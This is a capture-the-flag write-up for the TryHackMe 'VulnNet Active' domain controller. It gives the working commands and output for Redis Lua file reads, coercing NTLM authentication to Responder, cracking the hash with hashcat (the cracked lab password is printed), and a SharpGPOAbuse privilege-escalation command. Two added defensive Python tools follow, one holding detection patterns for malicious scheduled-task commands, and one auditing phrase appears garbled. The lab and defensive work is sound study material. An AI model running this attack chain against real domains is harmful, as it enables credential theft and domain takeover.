CREATE & DESTROY


VulnNet Active | TryHackMe

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
6379/tcp  open  redis         Redis key-value store 2w
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49765/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-09-08T10:54:11
|_  start_date: N/A

DNS on 53, kpasswd on 464 and AD Web Services (.NET Message Framing) on 9389 say we are looking at a domain controller. Note also that smb2-security-mode reports message signing as required, so relaying captured authentication back to this host over SMB is off the table. Running crackmapexec against SMB gives us the domain name vulnnet.local, which we’ll use to further enumerate the box.

SMB accepts a null session but lists no shares. Redis on 6379, however, accepts connections without any authentication at all.

redis-cli -h 10.10.134.34
10.10.134.34:6379> config get dir
1) "dir"
2) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"

That path gives us a username (enterprise-security) and the Redis build in use, but I spend a long time attempting various methods of RCE with no luck. Eventually I come across a page on Lua scripting in Redis (the EVAL command). Initially I wonder whether it can be used for a reverse shell, but it can also be used to read files on the server: dofile() loads a file and runs it as Lua, so a non-Lua file fails to parse and the parser error quotes the token it tripped over. Trying some common Windows files gives errors, but for system32\drivers\etc\hosts the error is at the symbol #, which is the comment character at the top of that file, so the file is clearly being read and parsed.

redis-cli -h 10.10.100.148 eval "dofile('c:\\\windows\\\system32\\\drivers\\\etc\\\hosts')" 0
(error) ERR Error running script (call to f_6bbf051066d6329b897e50da35b0572543917ab4): @user_script:1: c:\windows\system32\drivers\etc\hosts:2: unexpected symbol near '#'

As a further test, and knowing where TryHackMe usually puts its flags, we try to read user.txt from the user’s desktop:

redis-cli -h 10.10.100.148 eval "dofile('c:\\\users\\\enterprise-security\\\desktop\\\user.txt')" 0
(error) ERR Error running script (call to f_0a5fc213d32a52ab24b6bcf4d79058f7b03a659d): @user_script:1: c:\users\enterprise-security\desktop\user.txt:1: malformed number near '3eb176aee96432d5b100bc93580b291e' 

It looks as though the THM{} wrapper was stripped, but that is just the Lua lexer at work: THM is a valid name and { opens a table constructor, so the first token it rejects is the hex body of the flag, and that is what the error quotes. Either way, the file contents leak one error message at a time.

After trying lots of ways to pull a whole file, I start an SMB server and confirm the box will connect back to us: dofile() is just a file open on the Redis side, so pointing it at a UNC path on our host makes the Redis service authenticate to our share. Swap the SMB server for Responder and we can capture the NetNTLMv2 response of the account the service runs as.

Responder hands back the NetNTLMv2 challenge/response. This is not a reusable password hash: it is bound to the challenge Responder issued, so with relaying ruled out by the signing requirement on the DC, cracking it offline with hashcat mode 5600 is the way to turn it into access.

hashcat -m 5600 enterprise-security /usr/share/wordlists/rockyou.txt --force                                                                     
hashcat (v6.2.5) starting  
...
ENTERPRISE-SECURITY::VULNNET:42448cf121962106:8f037d8c53edc33e81727a7637c3e918:010100000000000080cb203791c3d8011a8d2776e2ec1732000000000200080035004e
0039004b0001001e00570049004e002d0054004d004b0057003100340054004f0030005600580004003400570049004e002d0054004d004b0057003100340054004f003000560058002e0
035004e0039004b002e004c004f00430041004c000300140035004e0039004b002e004c004f00430041004c000500140035004e0039004b002e004c004f00430041004c000700080080cb
203791c3d80106000400020000000800300030000000000000000000000000300000ad926486cbafb0b4f9406c7602ca122c017e82565d6576257974f7d3620d50cc0a001000000000000
000000000000000000000000900220063006900660073002f00310030002e00310038002e003100300035002e00360034000000000000000000:sand_0873959498                  
                                                           
Session..........: hashcat
Status...........: Cracked
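
As an added example (not part of the original post), here is a small Python dissector for the 5600 line above. Its only input is the cracked line copied verbatim from the hashcat output, re-joined because the terminal wrapped it. It pulls apart the NTLMv2 blob: the header, the client timestamp, the client challenge and the AV_PAIR target-info list. That list is worth reading, because the client copies it from the server's CHALLENGE message: the NetBIOS and DNS names in it are Responder's invented ones, not VULNNET's, while MsvAvTargetName is the SPN the victim really tried to reach, which records the attacker's IP. From the defender's side that field alone tells you where the coerced authentication went.

```python
"""Dissect a NetNTLMv2 capture written in hashcat's -m 5600 format.

A 5600 line is USER::DOMAIN:server_challenge:NTProofStr:blob[:password].
The blob is the NTLMv2_CLIENT_CHALLENGE structure from MS-NLMP: a fixed
header, a FILETIME timestamp, the client challenge and the AV_PAIR list
("target info") that the client copied from the server's CHALLENGE_MESSAGE.
When the server was Responder, those pairs carry Responder's made-up names,
while MsvAvTargetName records the SPN the victim really asked for.
"""
import struct
from datetime import datetime, timedelta, timezone

# The cracked line from the hashcat output above, re-joined (the terminal
# had wrapped it) and otherwise copied verbatim.
CAPTURED_LINE = (
    "ENTERPRISE-SECURITY::VULNNET:42448cf121962106:8f037d8c53edc33e81727a7637c3e918:"
    "010100000000000080cb203791c3d8011a8d2776e2ec1732000000000200080035004e"
    "0039004b0001001e00570049004e002d0054004d004b0057003100340054004f0030005600580004003400570049004e002d0054004d004b0057003100340054004f003000560058002e0"
    "035004e0039004b002e004c004f00430041004c000300140035004e0039004b002e004c004f00430041004c000500140035004e0039004b002e004c004f00430041004c000700080080cb"
    "203791c3d80106000400020000000800300030000000000000000000000000300000ad926486cbafb0b4f9406c7602ca122c017e82565d6576257974f7d3620d50cc0a001000000000000"
    "000000000000000000000000900220063006900660073002f00310030002e00310038002e003100300035002e00360034000000000000000000"
    ":sand_0873959498"
)

AV_NAMES = {
    0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
    3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
    6: "MsvAvFlags", 7: "MsvAvTimestamp", 8: "MsvAvSingleHost",
    9: "MsvAvTargetName", 10: "MsvAvChannelBindings",
}
STRING_AV_IDS = {1, 2, 3, 4, 5, 9}


def filetime_to_datetime(filetime):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)


def parse_av_pairs(data):
    """Decode an AV_PAIR list: <H AvId, <H AvLen, then AvLen bytes of value.

    Strings are UTF-16LE, MsvAvFlags is a little-endian DWORD, MsvAvTimestamp
    a FILETIME; anything else is kept raw.  Stops at MsvAvEOL (AvId 0)."""
    pairs, pos = {}, 0
    while pos + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, pos)
        pos += 4
        value = data[pos:pos + av_len]
        pos += av_len
        if av_id == 0:
            break
        if av_id in STRING_AV_IDS:
            pairs[av_id] = value.decode("utf-16-le", errors="replace")
        elif av_id == 6 and len(value) == 4:
            pairs[av_id] = struct.unpack("<I", value)[0]
        elif av_id == 7 and len(value) == 8:
            pairs[av_id] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            pairs[av_id] = value
    return pairs


def parse_hashcat_5600(line):
    """Split a 5600 line and dissect its NTLMv2 blob into a dict."""
    user, _, domain, server_challenge, nt_proof_str, rest = line.strip().split(":", 5)
    blob_hex, _, password = rest.partition(":")  # ":password" is present only once cracked
    blob = bytes.fromhex(blob_hex)
    # RespType, HiRespType, Reserved1, Reserved2, TimeStamp, ChallengeFromClient, Reserved3
    resp_type, hi_resp_type, _, _, timestamp, client_challenge, _ = struct.unpack_from(
        "<BBHIQ8sI", blob, 0)
    return {
        "user": user,
        "domain": domain,  # the victim's own domain, exactly as the client sent it
        "server_challenge": bytes.fromhex(server_challenge),
        "nt_proof_str": bytes.fromhex(nt_proof_str),
        "response_type": (resp_type, hi_resp_type),
        "timestamp": filetime_to_datetime(timestamp),
        "client_challenge": client_challenge,
        "target_info": parse_av_pairs(blob[28:]),  # the header unpacked above is 28 bytes
        "cracked_password": password or None,
    }


def describe(result):
    """Human-readable summary, one line per field."""
    lines = [
        f"account            : {result['domain']}\\{result['user']}",
        f"server challenge   : {result['server_challenge'].hex()}",
        f"client challenge   : {result['client_challenge'].hex()}",
        f"NTProofStr         : {result['nt_proof_str'].hex()}",
        f"client timestamp   : {result['timestamp'].isoformat()}",
    ]
    for av_id, value in result["target_info"].items():
        shown = value.hex() if isinstance(value, bytes) else value
        lines.append(f"{AV_NAMES.get(av_id, 'AvId ' + str(av_id)):<19}: {shown}")
    if result["cracked_password"]:
        lines.append(f"cracked password   : {result['cracked_password']}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(describe(parse_hashcat_5600(CAPTURED_LINE)))
```

Run it as a script to see the decoded capture. The NbDomainName/DnsDomainName pairs come out as Responder's random names rather than VULNNET, which is the tell that this response was answered by a rogue server, and MsvAvTargetName gives the cifs/ SPN of the host the Redis service was coerced into authenticating to.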

With valid credentials we can enumerate further.

smbmap shows a share we can access, and connecting to it we find a single file, “PurgeIrrelevantData_1826.ps1”. Downloading it, it is just a one-line cleanup script, most likely run from the share by a scheduled task. Before going down that road I check whether the credentials give us any other remote access (WinRM and the like), which they don’t.

cat PurgeIrrelevantData_1826.ps1                                           
rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue

Since whatever is in that file gets executed by whatever runs it, I use my new favourite Windows reverse shell generator to replace the script’s contents with a PowerShell reverse shell, put it back on the SMB share and wait…

Despite our user having SeImpersonatePrivilege, it turns out PrintSpoofer doesn’t work here (not for lack of trying), so there are no easy wins. The first thing I do is run BloodHound to get an idea of what we can exploit.

BloodHound shows that our user has write privileges over the GPO SECURITY-POL-VN. After much hunting I discover SharpGPOAbuse, a tool for abusing a writable GPO by adding a scheduled task, startup script or user right for the users or computers the GPO applies to. An immediate computer task runs as SYSTEM on every machine in the GPO’s scope at its next policy refresh, so:

.\SharpGPOAbuse.exe --AddComputerTask --TaskName "PrivEsc" --Author vulnnet\Administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Enterprise-Share> get-aduser -identity enterprise-security -properties * | select MemberOf

MemberOf                                          
--------                                          
{CN=Administrators,CN=Builtin,DC=vulnnet,DC=local}
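
What SharpGPOAbuse actually wrote is a Group Policy Preferences ScheduledTasks.xml under the GPO’s Machine\Preferences\ScheduledTasks folder in SYSVOL (the path is in the tool output above). As an added example, not from the write-up or from SharpGPOAbuse, here is a Python checker that parses such a file and flags the tasks a defender would want to look at: immediate tasks, tasks that run as SYSTEM, and Exec actions that change group membership or spawn a shell. The XML is constructed for the example: the first task’s name, author, command and arguments are taken from the tool output above, while the timestamps, uid values, the second (legitimate-looking) task and the svc-logarchive account are invented for contrast. The clsid attributes follow the GPP schema as commonly published; the parser does not depend on them.

```python
"""Audit a GPP ScheduledTasks.xml for planted tasks.

SharpGPOAbuse --AddComputerTask writes an ImmediateTaskV2 into
<GPO>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml in SYSVOL and
bumps the GPO version, so every computer in scope runs the task as SYSTEM at
its next policy refresh.  This checker parses that file and reports tasks
that trip any of a few heuristics a defender would apply.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample.  Task one is modelled on the task added above (name,
# author, command, arguments); task two is an invented legitimate task.
SAMPLE_SCHEDULED_TASKS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="PrivEsc"
      image="0" changed="2022-09-08 11:02:00" uid="{0F8F1D1A-0000-4000-8000-000000000001}">
    <Properties action="C" name="PrivEsc" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <RegistrationInfo><Author>vulnnet\Administrator</Author><Description></Description></RegistrationInfo>
        <Principals><Principal id="Author"><UserId>NT AUTHORITY\System</UserId>
          <RunLevel>HighestAvailable</RunLevel><LogonType>S4U</LogonType></Principal></Principals>
        <Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary>
          <EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
        <Actions Context="Author"><Exec><Command>cmd.exe</Command>
          <Arguments>/c net localgroup administrators enterprise-security /add</Arguments></Exec></Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="Archive security log"
      image="2" changed="2022-03-01 09:15:00" uid="{0F8F1D1A-0000-4000-8000-000000000002}">
    <Properties action="U" name="Archive security log" runAs="VULNNET\svc-logarchive" logonType="Password">
      <Task version="1.2">
        <RegistrationInfo><Author>VULNNET\Administrator</Author></RegistrationInfo>
        <Actions Context="Author"><Exec><Command>C:\Windows\System32\wevtutil.exe</Command>
          <Arguments>epl Security D:\Archive\security.evtx</Arguments></Exec></Actions>
      </Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>
"""

# Patterns are matched against "<Command> <Arguments>" of each Exec action.
SUSPICIOUS_COMMANDS = [
    (re.compile(r"\bnet1?\s+(localgroup|group)\b.*/add\b", re.I), "adds an account to a group"),
    (re.compile(r"\bnet1?\s+user\b.*/add\b", re.I), "creates a user account"),
    (re.compile(r"\b(powershell|pwsh)\b.*(-e(nc|ncodedcommand)?\b|iex|downloadstring|frombase64string)",
                re.I), "runs encoded or downloaded PowerShell"),
    (re.compile(r"\b(cmd(\.exe)?\s+/[ck]|mshta|rundll32|regsvr32|certutil|bitsadmin)\b", re.I),
     "spawns a shell or LOLBin"),
]


def audit_scheduled_tasks(xml_text):
    """Return one finding (dict) per task that trips at least one heuristic."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    findings = []
    for task in root:  # TaskV2 / ImmediateTaskV2, plus legacy Task / ImmediateTask
        props = task.find("Properties")
        if props is None:
            continue
        exec_node = props.find("./Task/Actions/Exec")
        command = (exec_node.findtext("Command", "") if exec_node is not None else "").strip()
        arguments = (exec_node.findtext("Arguments", "") if exec_node is not None else "").strip()
        run_as = props.get("runAs", "")
        reasons = []
        if task.tag.startswith("Immediate"):
            reasons.append("immediate task: runs once at the next refresh, then is removed")
        if run_as.split("\\")[-1].lower() == "system":
            reasons.append("runs as SYSTEM")
        command_line = f"{command} {arguments}".strip()
        for pattern, reason in SUSPICIOUS_COMMANDS:
            if pattern.search(command_line):
                reasons.append(reason)
        if reasons:
            findings.append({
                "kind": task.tag,
                "name": task.get("name", ""),
                "author": (props.findtext("./Task/RegistrationInfo/Author") or "").strip(),
                "run_as": run_as,
                "command": command,
                "arguments": arguments,
                "changed": task.get("changed", ""),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in audit_scheduled_tasks(SAMPLE_SCHEDULED_TASKS_XML):
        print(f"[!] {f['kind']} '{f['name']}' by {f['author']} (changed {f['changed']})")
        print(f"    runAs={f['run_as']}  exec: {f['command']} {f['arguments']}")
        for reason in f["reasons"]:
            print(f"    - {reason}")
```

In practice you would run this over every ScheduledTasks.xml under \\<domain>\SYSVOL\<domain>\Policies\*\{Machine,User}\Preferences\ScheduledTasks\ and correlate hits with the GPT.ini version bump and the directory-change events (4 means 5136 when GPO object auditing is on) from the same time window; an immediate task that ran as SYSTEM and then deleted itself leaves little else behind.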

The tool’s output also tells us something useful: {31B2F340-016D-11D2-945F-00C04FB984F9} is the well-known GUID of the Default Domain Policy, so SECURITY-POL-VN is that policy renamed, and it applies to every computer in the domain, the DC included. Domain controllers refresh policy roughly every five minutes (members every 90 minutes plus a random offset), or gpupdate /force does it immediately. Once the task has run and our account is in Administrators, as the get-aduser output confirms, we can PsExec into the server and grab the root flag.

This was a really informative box. I spent a significant amount of time getting the initial foothold and a while to figure out how to escalate. Lots of thanks to Google and the smart AD hackers out there!
